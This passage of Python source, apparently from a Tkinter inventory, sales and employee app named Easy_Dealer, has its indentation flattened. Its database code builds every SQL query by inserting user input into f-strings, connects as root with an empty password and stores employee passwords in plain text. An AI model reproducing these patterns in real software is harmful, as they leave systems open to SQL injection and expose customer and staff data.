widget.destroy()
search_edit.delete(0, 'end')
alert_label.config(text='Successfully updated the product', bg='#2FA422', fg='white')
self.content_frame.after(1500, disappear_alert_label)
except Exception as e:
alert_label.config(text='Sorry! Unable to update', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
searched_product_id = search_edit.get()
if searched_product_id == '':
alert_label.config(text='Enter a product ID', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
for widget in self.update_content_frame.winfo_children():
widget.destroy()
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM product WHERE Product_ID = "{searched_product_id}"'
my_cursor.execute(query)
product = my_cursor.fetchall()
if len(product) == 0:
alert_label.config(text='Product doesn\'t exists', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
product_id = product[0][0]
product_name = product[0][1]
product_category = product[0][2]
purchase_price = product[0][3]
dop = product[0][4]
update_product_content_label = Label(self.update_content_frame, image=self.update_content_image, bd=0)
update_product_content_label.place(x=230, y=24)
product_name_label = Label(self.update_content_frame, text='Product Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_name_label.place(x=106, y=46)
product_id_label = Label(self.update_content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_id_label.place(x=106, y=111)
purchase_price_label = Label(self.update_content_frame, text='Purchase Price', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
purchase_price_label.place(x=106, y=177)
product_category_label = Label(self.update_content_frame, text='Product Category', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_category_label.place(x=106, y=243)
dop_label = Label(self.update_content_frame, text='Date Of Purchase', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dop_label.place(x=106, y=309)
product_name_edit = Entry(self.update_content_frame, text='Product Name', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
product_name_edit.place(x=281, y=46)
product_id_edit = Entry(self.update_content_frame, text='Product ID', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
product_id_edit.place(x=281, y=111)
purchase_price_edit = Entry(self.update_content_frame, text='Purchase Price', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
purchase_price_edit.place(x=281, y=177)
product_category_edit = Entry(self.update_content_frame, text='Product Category', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
product_category_edit.place(x=281, y=243)
dop_edit = Entry(self.update_content_frame, text='Date Of Purchase', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
dop_edit.place(x=281, y=309)
product_name_edit.delete(0, 'end')
product_id_edit.delete(0, 'end')
purchase_price_edit.delete(0, 'end')
product_category_edit.delete(0, 'end')
dop_edit.delete(0, 'end')
product_name_edit.insert(0, product_name)
product_id_edit.insert(0, product_id)
purchase_price_edit.insert(0, purchase_price)
product_category_edit.insert(0, product_category)
dop_edit.insert(0, dop)
update_button = Button(self.update_content_frame, cursor='hand2', image=self.update_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=update)
update_button.place(x=723, y=370)
except Exception as e:
alert_label.config(text='Sorry! Something went wrong..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
for widget in self.content_frame.winfo_children():
widget.destroy()
self.update_products_bg_label = Label(self.content_frame, image=self.update_product_bg_image)
self.update_products_bg_label.place(x=-2, y=-2)
update_product_label = Label(self.content_frame, text='UPDATE PRODUCT', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
update_product_label.place(x=50, y=50)
product_id_search_label = Label(self.content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_id_search_label.place(x=160, y=116)
search_edit = Entry(self.content_frame, width=60, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
search_edit.place(x=270, y=116)
search_edit.delete(0, 'end')
search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=search)
search_button.place(x=776, y=105)
self.update_content_frame = Frame(self.content_frame, width=980, height=470, bg='#292B37') # bg='#292B37'
self.update_content_frame.place(x=0, y=161)
alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
alert_label.place(x=90, y=530)
def delete_products_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#3C3F4A')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
def search():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
def delete():
user_response = messagebox.askokcancel('Confirm Deletion', 'Do you want to delete the product ?')
if user_response:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'DELETE FROM product WHERE Product_ID = "{searched_product_id}";'
my_cursor.execute(query)
db.commit()
db.close()
for widget in self.delete_content_frame.winfo_children():
widget.destroy()
search_edit.delete(0, 'end')
alert_label.config(text='Successfully deleted the product', bg='#2FA422', fg='white')
self.content_frame.after(1500, disappear_alert_label)
except Exception as e:
alert_label.config(text='Sorry! Unable to delete', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
pass
searched_product_id = search_edit.get()
if searched_product_id == '':
alert_label.config(text='Enter a product ID', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
for widget in self.delete_content_frame.winfo_children():
widget.destroy()
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM product WHERE Product_ID = "{searched_product_id}"'
my_cursor.execute(query)
product = my_cursor.fetchall()
if len(product) == 0:
alert_label.config(text='Product doesn\'t exists', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
product_id = product[0][0]
product_name = product[0][1]
product_category = product[0][2]
purchase_price = product[0][3]
dop = product[0][4]
product_name_label = Label(self.delete_content_frame, text='Product Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_name_label.place(x=106, y=46)
product_id_label = Label(self.delete_content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_id_label.place(x=106, y=111)
purchase_price_label = Label(self.delete_content_frame, text='Purchase Price', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
purchase_price_label.place(x=106, y=177)
product_category_label = Label(self.delete_content_frame, text='Product Category', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_category_label.place(x=106, y=243)
dop_label = Label(self.delete_content_frame, text='Date Of Purchase', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dop_label.place(x=106, y=309)
product_name_label1 = Label(self.delete_content_frame, text=f'{product_name}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
product_name_label1.place(x=281, y=46)
product_id_label1 = Label(self.delete_content_frame, text=f'{product_id}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
product_id_label1.place(x=281, y=111)
purchase_price_label1 = Label(self.delete_content_frame, text=f'{purchase_price}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
purchase_price_label1.place(x=281, y=177)
product_category_label1 = Label(self.delete_content_frame, text=f'{product_category}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
product_category_label1.place(x=281, y=243)
dop_label1 = Label(self.delete_content_frame, text=f'{dop}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
dop_label1.place(x=281, y=309)
delete_button = Button(self.delete_content_frame, cursor='hand2', image=self.delete_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=delete)
delete_button.place(x=723, y=370)
except Exception as e:
alert_label.config(text='Sorry! Something went wrong..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
for widget in self.content_frame.winfo_children():
widget.destroy()
self.delete_products_bg_label = Label(self.content_frame, image=self.update_product_bg_image)
self.delete_products_bg_label.place(x=-2, y=-2)
delete_product_label = Label(self.content_frame, text='DELETE PRODUCT', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
delete_product_label.place(x=50, y=50)
product_id_search_label = Label(self.content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_id_search_label.place(x=160, y=116)
search_edit = Entry(self.content_frame, width=60, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
search_edit.place(x=270, y=116)
search_edit.delete(0, 'end')
search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=search)
search_button.place(x=776, y=105)
self.delete_content_frame = Frame(self.content_frame, width=980, height=470, bg='#292B37') # bg='#292B37'
self.delete_content_frame.place(x=0, y=161)
alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
alert_label.place(x=90, y=530)
def sales_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#3C3F4A')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
def sale():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
product_name = product_name_entry.get()
product_id = product_id_entry.get()
selling_price = selling_price_entry.get()
product_category = product_category_entry.get()
dos = dos_entry.get()
customer_name = customer_name_entry.get()
phone = phone_entry.get()
email = email_entry.get()
address = address_entry.get()
if product_name == '' or product_id == '' or selling_price == '' or product_category == '' or dos == '' or customer_name == '' or phone == '' or email == '' or address == '':
alert_label.config(text='Fill up all the fields..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM product WHERE Product_ID = "{product_id}"'
my_cursor.execute(query)
product = my_cursor.fetchall()
if len(product) == 0:
alert_label.config(text='Oops! Product not available', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
query = f'SELECT * FROM customer WHERE Phone_Number = "{phone}"'
my_cursor.execute(query)
customer = my_cursor.fetchall()
if len(customer) == 0:
query = f'INSERT INTO customer (Full_Name, Email, Phone_Number, Address) VALUE ("{customer_name}", "{email}", "{phone}", "{address}");'
my_cursor.execute(query)
db.commit()
query = f'SELECT Customer_ID FROM customer WHERE Phone_Number = "{phone}";'
my_cursor.execute(query)
customer_id = my_cursor.fetchall()[0][0]
query = f'SELECT Price FROM product WHERE Product_ID = "{product_id}";'
my_cursor.execute(query)
purchase_price = my_cursor.fetchone()[0]
query = f'INSERT INTO Sell (Customer_ID, Product_ID, Product_Name, Product_Category, Purchase_Price, Selling_Price, DOS) Value ({int(customer_id)}, "{product_id}", "{product_name}", "{product_category}", {float(purchase_price)}, {float(selling_price)}, "{dos}");'
my_cursor.execute(query)
db.commit()
query = f'DELETE FROM product WHERE Product_ID = "{product_id}"'
my_cursor.execute(query)
db.commit()
alert_label.config(text='Product has been sold..', bg='#2FA422', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
query = f'UPDATE customer SET Full_Name = "{customer_name}", Email= "{email}", Address="{address}" WHERE Phone_Number = "{phone}";'
my_cursor.execute(query)
db.commit()
query = f'SELECT Customer_ID FROM customer WHERE Phone_Number = "{phone}";'
my_cursor.execute(query)
customer_id = my_cursor.fetchall()[0][0]
query = f'SELECT Price FROM product WHERE Product_ID = "{product_id}";'
my_cursor.execute(query)
purchase_price = my_cursor.fetchone()[0]
query = f'INSERT INTO Sell (Customer_ID, Product_ID, Product_Name, Product_Category, Purchase_Price, Selling_Price, DOS) Value ({int(customer_id)}, "{product_id}", "{product_name}", "{product_category}", {float(purchase_price)}, {float(selling_price)}, "{dos}");'
my_cursor.execute(query)
db.commit()
query = f'DELETE FROM product WHERE Product_ID = "{product_id}"'
my_cursor.execute(query)
db.commit()
alert_label.config(text='Product has been sold..', bg='#2FA422', fg='white')
self.content_frame.after(1500, disappear_alert_label)
product_id_entry.delete(0, 'end')
product_name_entry.delete(0, 'end')
selling_price_entry.delete(0, 'end')
product_category_entry.delete(0, 'end')
dos_entry.delete(0, 'end')
customer_name_entry.delete(0, 'end')
phone_entry.delete(0, 'end')
email_entry.delete(0, 'end')
address_entry.delete(0, 'end')
except Exception as e:
alert_label.config(text='Oops! Something went wrong..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
def search():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
searched_product_id = product_id_entry.get()
if searched_product_id == '':
alert_label.config(text='Enter a product id..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM product WHERE Product_ID = "{searched_product_id}"'
my_cursor.execute(query)
product = my_cursor.fetchall()
if len(product) == 0:
product_name_entry.delete(0, 'end')
product_category_entry.delete(0, 'end')
alert_label.config(text='Oops! Product not available', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
product_name_entry.delete(0, 'end')
product_category_entry.delete(0, 'end')
product_name_entry.insert(0, product[0][1])
product_category_entry.insert(0, product[0][2])
except Exception as e:
alert_label.config(text='Sorry! Unable to load data..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
for widget in self.content_frame.winfo_children():
widget.destroy()
sales_bg_label = Label(self.content_frame, image=self.sales_bg_image)
sales_bg_label.place(x=-2, y=-2)
sales_label = Label(self.content_frame, text='SALES', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
sales_label.place(x=50, y=40)
product_details_label = Label(self.content_frame, text='PRODUCT DETAILS', font=('Arial Rounded MT', 12, 'bold'), bg='#333646', fg='#BBBBBB')
product_details_label.place(x=65, y=101)
product_id_label = Label(self.content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
product_id_label.place(x=96, y=145)
product_name_label = Label(self.content_frame, text='Product Name', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
product_name_label.place(x=96, y=182)
selling_price_label = Label(self.content_frame, text='Selling Price', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
selling_price_label.place(x=96, y=220)
product_category_label = Label(self.content_frame, text='Product Category', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
product_category_label.place(x=96, y=257)
dos_label = Label(self.content_frame, text='Date Of Sell', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
dos_label.place(x=96, y=294)
customer_details_label = Label(self.content_frame, text='CUSTOMER DETAILS', font=('Arial Rounded MT', 12, 'bold'), bg='#333646', fg='#BBBBBB')
customer_details_label.place(x=65, y=345)
customer_name_label = Label(self.content_frame, text='Customer Name', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
customer_name_label.place(x=96, y=388)
phone_label = Label(self.content_frame, text='Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
phone_label.place(x=96, y=425)
email_label = Label(self.content_frame, text='E-mail', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
email_label.place(x=96, y=462)
address_label = Label(self.content_frame, text='Address', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
address_label.place(x=96, y=499)
product_id_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
product_id_entry.place(x=247, y=150)
product_name_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
product_name_entry.place(x=247, y=186)
selling_price_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
selling_price_entry.place(x=247, y=222)
product_category_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
product_category_entry.place(x=247, y=258)
dos_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
dos_entry.place(x=247, y=294)
customer_name_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
customer_name_entry.place(x=247, y=391)
phone_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
phone_entry.place(x=247, y=427)
email_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
email_entry.place(x=247, y=463)
address_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
address_entry.place(x=247, y=499)
search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_icon_image, borderwidth=0, activebackground='#686972', bg='#686972', command=search)
search_button.place(x=677, y=150)
ok_button = Button(self.content_frame, cursor='hand2', image=self.ok_button_image, borderwidth=0, activebackground='#292B37', bg='#292B37', command=sale)
ok_button.place(x=675, y=565)
alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
alert_label.place(x=90, y=565)
def selling_history_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#3C3F4A')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
for widget in self.content_frame.winfo_children():
widget.destroy()
def bound_to_mousewheel(event):
showall_canvas.bind_all("<MouseWheel>", on_mousewheel)
def unbound_to_mousewheel(event):
showall_canvas.unbind_all("<MouseWheel>")
def on_mousewheel(event):
showall_canvas.yview_scroll(int(-1 * (event.delta / 120)), "units")
temp_frame = Frame(self.content_frame, width=960, height=514, bg='#292B37', border=None)
temp_frame.place(x=2, y=115)
showall_canvas = Canvas(temp_frame, width=960, height=514, bg='#292B37')
vertical_bar = ttk.Scrollbar(temp_frame, orient='vertical', command=showall_canvas.yview)
vertical_bar.pack(side=RIGHT, fill='y')
showall_canvas.config(yscrollcommand=vertical_bar.set)
final_frame = Frame(temp_frame, width=960, height=514, bg='#292B37')
showall_canvas.create_window((0, 0), window=final_frame, anchor='nw')
showall_canvas.bind('<Configure>', lambda e: showall_canvas.configure(scrollregion=showall_canvas.bbox('all')))
final_frame.bind('<Enter>', bound_to_mousewheel)
final_frame.bind('<Leave>', unbound_to_mousewheel)
border_hide_frame1 = Frame(self.content_frame, bg='#292B37', height=7, width=958)
border_hide_frame1.place(x=6, y=111)
border_hide_frame2 = Frame(self.content_frame, bg='#292B37', height=638, width=7)
border_hide_frame2.place(x=-1, y=111)
border_hide_frame3 = Frame(self.content_frame, bg='#292B37', height=519, width=7)
border_hide_frame3.place(x=959, y=112)
showall_canvas.config(yscrollcommand=vertical_bar.set)
showall_canvas.pack(side=LEFT, expand=True, fill=BOTH)
selling_history_bg_frame = Frame(self.content_frame, bg='#292B37', height=107, width=958)
selling_history_bg_frame.place(x=2, y=9)
selling_history_bg_label = Label(selling_history_bg_frame, image=self.show_employees_bg_image, bg='#292B37')
selling_history_bg_label.place(x=-2, y=-2)
selling_history_label = Label(selling_history_bg_frame, text='SELLING HISTORY', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
selling_history_label.place(x=50, y=40)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT Sell.Product_ID, sell.Product_Name, Sell.Product_Category, Sell.Purchase_Price, Sell.Selling_Price, Sell.DOS, Customer.Full_Name, Customer.Phone_Number, Customer.Email, Customer.Address FROM Sell, Customer WHERE sell.Customer_ID = customer.Customer_ID'
my_cursor.execute(query)
sells = my_cursor.fetchall()
for i in range(len(sells)):
employee_frame = Frame(final_frame, bg='#292B37', height=393, width=958)
employee_frame_bg_label = Label(employee_frame, image=self.selling_history_bg_image, bg='#292B37')
employee_frame_bg_label.place(x=-2, y=-2)
selling_details_label = Label(employee_frame, text='Selling Details', font=('Arial Rounded MT', 14, 'bold'), bg='#50515B', fg='#BBBBBB')
selling_details_label.place(x=51, y=27)
product_name_label = Label(employee_frame, text=sells[i][1], font=('Arial Rounded MT', 16, 'bold'), bg='#50515B', fg='white')
product_name_label.place(x=82, y=70)
selling_price_label = Label(employee_frame, text='$ ' + str(sells[i][4]), font=('Arial Rounded MT', 10, 'bold'), bg='#50515B', fg='white')
selling_price_label.place(x=82, y=96)
product_id_label = Label(employee_frame, text=f'Product ID : {sells[i][0]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
product_id_label.place(x=82, y=123)
product_category_label = Label(employee_frame, text=f'Category : {sells[i][2]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
product_category_label.place(x=82, y=152)
date_of_sell_label = Label(employee_frame, text=f'Date of Sale : {sells[i][5]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
date_of_sell_label.place(x=82, y=181)
profit_label = Label(employee_frame, text=f'Profit : {sells[i][4] - sells[i][3]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
profit_label.place(x=82, y=210)
customer_name_label = Label(employee_frame, text=f'Customer Name : {sells[i][6]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
customer_name_label.place(x=82, y=250)
phone_label = Label(employee_frame, text=f'Phone Number : {sells[i][7]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
phone_label.place(x=82, y=278)
email_label = Label(employee_frame, text=f'E-mail : {sells[i][8]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
email_label.place(x=82, y=306)
address_label = Label(employee_frame, text=f'Address : {sells[i][9]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
address_label.place(x=82, y=335)
employee_frame.pack()
except Exception as e:
print(e)
def show_employees_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#3C3F4A')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
for widget in self.content_frame.winfo_children():
widget.destroy()
def bound_to_mousewheel(event):
showall_canvas.bind_all("<MouseWheel>", on_mousewheel)
def unbound_to_mousewheel(event):
showall_canvas.unbind_all("<MouseWheel>")
def on_mousewheel(event):
showall_canvas.yview_scroll(int(-1 * (event.delta / 120)), "units")
temp_frame = Frame(self.content_frame, width=960, height=514, bg='#292B37', border=None)
temp_frame.place(x=2, y=115)
showall_canvas = Canvas(temp_frame, width=960, height=514, bg='#292B37')
vertical_bar = ttk.Scrollbar(temp_frame, orient='vertical', command=showall_canvas.yview)
vertical_bar.pack(side=RIGHT, fill='y')
showall_canvas.config(yscrollcommand=vertical_bar.set)
final_frame = Frame(temp_frame, width=960, height=514, bg='#292B37')
showall_canvas.create_window((0, 0), window=final_frame, anchor='nw')
showall_canvas.bind('<Configure>', lambda e: showall_canvas.configure(scrollregion=showall_canvas.bbox('all')))
final_frame.bind('<Enter>', bound_to_mousewheel)
final_frame.bind('<Leave>', unbound_to_mousewheel)
border_hide_frame1 = Frame(self.content_frame, bg='#292B37', height=7, width=958)
border_hide_frame1.place(x=6, y=111)
border_hide_frame2 = Frame(self.content_frame, bg='#292B37', height=638, width=7)
border_hide_frame2.place(x=-1, y=111)
border_hide_frame3 = Frame(self.content_frame, bg='#292B37', height=519, width=7)
border_hide_frame3.place(x=959, y=112)
showall_canvas.config(yscrollcommand=vertical_bar.set)
showall_canvas.pack(side=LEFT, expand=True, fill=BOTH)
show_employees_bg_frame = Frame(self.content_frame, bg='#292B37', height=107, width=958)
show_employees_bg_frame.place(x=2, y=9)
show_employees_bg_label = Label(show_employees_bg_frame, image=self.show_employees_bg_image, bg='#292B37')
show_employees_bg_label.place(x=-2, y=-2)
show_employees_label = Label(show_employees_bg_frame, text='SHOW EMPLOYEE INFORMATION', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
show_employees_label.place(x=50, y=40)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM user_table WHERE NOT Designation = "Owner"'
my_cursor.execute(query)
employees = my_cursor.fetchall()
for i in range(len(employees)):
employee_frame = Frame(final_frame, bg='#292B37', height=340, width=958)
employee_frame_bg_label = Label(employee_frame, image=self.show_employee_bg_image, bg='#292B37')
employee_frame_bg_label.place(x=-2, y=-2)
fullname_label = Label(employee_frame, text=employees[i][0], font=('Arial Rounded MT', 20, 'bold'), bg='#292B37', fg='white')
fullname_label.place(x=58, y=22)
designation_label = Label(employee_frame, text=employees[i][5], font=('Arial Rounded MT', 15, 'bold'), bg='#292B37', fg='white')
designation_label.place(x=58, y=72)
username_label = Label(employee_frame, text=f'Username : {employees[i][6]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
username_label.place(x=58, y=126)
salary_label = Label(employee_frame, text=f'Salary : {employees[i][8]} $', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
salary_label.place(x=58, y=162)
phone_label = Label(employee_frame, text=f'Phone Number : {employees[i][2]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
phone_label.place(x=58, y=198)
email_label = Label(employee_frame, text=f'E-mail : {employees[i][1]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
email_label.place(x=58, y=234)
address_label = Label(employee_frame, text=f'Address : {employees[i][3]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
address_label.place(x=58, y=270)
employee_frame.pack()
except Exception as e:
print(e)
def add_employees_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#3C3F4A')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
for widget in self.content_frame.winfo_children():
widget.destroy()
def add():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
employee_name = employee_name_entry.get()
username = username_entry.get()
password = password_entry.get()
phone_number = phone_number_entry.get()
salary = salary_entry.get()
designation = designation_entry.get()
if employee_name == '' or username == '' or password == '' or phone_number == '' or salary == '' or designation == '':
alert_label.config(text='Fill up all the fields', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
elif designation.lower() == 'owner':
alert_label.config(text='Sorry! Invalid input..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'INSERT INTO user_table (Full_Name, Phone_Number, Designation, UserName, User_Password, Salary) VALUE("{employee_name}", "{phone_number}", "{designation}", "{username}", "{password}", {salary});'
my_cursor.execute(query)
db.commit()
db.close()
alert_label.config(text='Employee added successfully..', bg='#2FA422', fg='white')
self.content_frame.after(1500, disappear_alert_label)
employee_name_entry.delete(0, 'end')
username_entry.delete(0, 'end')
password_entry.delete(0, 'end')
phone_number_entry.delete(0, 'end')
salary_entry.delete(0, 'end')
designation_entry.delete(0, 'end')
except Exception as e:
alert_label.config(text='Sorry! Invalid input..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
add_employees_bg_label = Label(self.content_frame, image=self.add_employees_bg_image)
add_employees_bg_label.place(x=-2, y=-2)
